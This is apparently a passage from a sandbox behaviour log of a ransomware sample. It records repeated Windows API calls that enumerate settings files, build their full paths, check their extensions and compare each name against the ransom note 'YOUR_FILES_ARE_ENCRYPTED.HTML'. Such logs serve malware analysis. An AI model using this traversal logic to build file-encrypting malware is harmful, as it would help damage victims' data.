pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms") returned 199 [0121.625] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms") returned=".settingcontent-ms" [0121.625] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.625] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms") returned=".settingcontent-ms" [0121.625] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b5a0835, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6b5a0835, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x529, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", cAlternateFileName="AA31F0~1.SET")) returned 1 [0121.626] StrStrIW (lpFirst="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.626] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms") returned 198 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms") returned=".settingcontent-ms" [0121.626] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms") returned=".settingcontent-ms" [0121.626] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c414b8d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6c414b8d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c3, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", cAlternateFileName="AA5C9A~1.SET")) returned 1 [0121.626] StrStrIW (lpFirst="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.626] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms") returned 182 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.626] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.626] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8f57a6, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfd8f57a6, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x546, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", cAlternateFileName="AA9529~1.SET")) returned 1 [0121.626] StrStrIW (lpFirst="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.626] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms") returned 204 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms") returned=".settingcontent-ms" [0121.626] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms") returned=".settingcontent-ms" [0121.626] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd98e121, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfd98e121, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", cAlternateFileName="AAED09~1.SET")) returned 1 [0121.626] StrStrIW (lpFirst="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.626] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms") returned 203 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms") returned=".settingcontent-ms" [0121.626] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms") returned=".settingcontent-ms" [0121.626] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ccc6, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfda4ccc6, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x537, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", cAlternateFileName="AA2914~1.SET")) returned 1 [0121.626] StrStrIW (lpFirst="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.626] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms") returned 201 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms") returned=".settingcontent-ms" [0121.626] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.626] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms") returned=".settingcontent-ms" [0121.626] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdb31cfc, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfdb31cfc, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", cAlternateFileName="AA1E1A~1.SET")) returned 1 [0121.626] StrStrIW (lpFirst="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.626] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms") returned 207 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms") returned=".settingcontent-ms" [0121.627] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms") returned=".settingcontent-ms" [0121.627] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdcaf23b, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfdcaf23b, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x546, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", cAlternateFileName="AA138B~1.SET")) returned 1 [0121.627] StrStrIW (lpFirst="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.627] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms") returned 205 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms") returned=".settingcontent-ms" [0121.627] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms") returned=".settingcontent-ms" [0121.627] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdd47bd4, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfdd47bd4, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x520, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", cAlternateFileName="AA1B73~1.SET")) returned 1 [0121.627] StrStrIW (lpFirst="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.627] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms") returned 197 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms") returned=".settingcontent-ms" [0121.627] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms") returned=".settingcontent-ms" [0121.627] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfde0687c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfde0687c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", cAlternateFileName="AAF42F~1.SET")) returned 1 [0121.627] StrStrIW (lpFirst="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.627] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms") returned 186 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms") returned=".settingcontent-ms" [0121.627] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms") returned=".settingcontent-ms" [0121.627] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdeeb6a3, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfdeeb6a3, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", cAlternateFileName="AAC2C5~1.SET")) returned 1 [0121.627] StrStrIW (lpFirst="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.627] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms") returned 200 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.627] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.627] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeab0f6f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfeab0f6f, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x529, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", cAlternateFileName="AA7FFC~1.SET")) returned 1 [0121.627] StrStrIW (lpFirst="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.627] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms") returned 202 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.627] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.627] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.627] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a385d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1a385d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", cAlternateFileName="AAEAA2~1.SET")) returned 1 [0121.627] StrStrIW (lpFirst="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.627] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms") returned 206 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.628] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.628] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aa79f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4aa79f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a7, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DateTime_Set.settingcontent-ms", cAlternateFileName="AAD480~1.SET")) returned 1 [0121.628] StrStrIW (lpFirst="AAA_SystemSettings_DateTime_Set.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.628] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_Set.settingcontent-ms") returned 176 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_Set.settingcontent-ms") returned=".settingcontent-ms" [0121.628] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_Set.settingcontent-ms") returned=".settingcontent-ms" [0121.628] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b8c81c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4b8c81c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d7, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", cAlternateFileName="AACB48~1.SET")) returned 1 [0121.628] StrStrIW (lpFirst="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.628] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms") returned 183 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms") returned=".settingcontent-ms" [0121.628] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms") returned=".settingcontent-ms" [0121.628] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c71605, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4c71605, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2347ee66, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d4, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", cAlternateFileName="AAFF0C~1.SET")) returned 1 [0121.628] StrStrIW (lpFirst="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.628] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms") returned 185 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.628] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.628] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da2867, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4da2867, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bd, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", cAlternateFileName="AA6049~1.SET")) returned 1 [0121.628] StrStrIW (lpFirst="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.628] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms") returned 181 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms") returned=".settingcontent-ms" [0121.628] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms") returned=".settingcontent-ms" [0121.628] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e876b3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4e876b3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c7, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", cAlternateFileName="AA0ACC~1.SET")) returned 1 [0121.628] StrStrIW (lpFirst="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.628] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms") returned 183 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms") returned=".settingcontent-ms" [0121.628] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.628] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms") returned=".settingcontent-ms" [0121.628] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f928c8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4f928c8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bd, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", cAlternateFileName="AA36FF~1.SET")) returned 1 [0121.632] StrStrIW (lpFirst="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.632] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms") returned 181 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms") returned=".settingcontent-ms" [0121.632] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.632] PathFindExtensionW (pszPath="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms") returned=".settingcontent-ms" [0121.632] 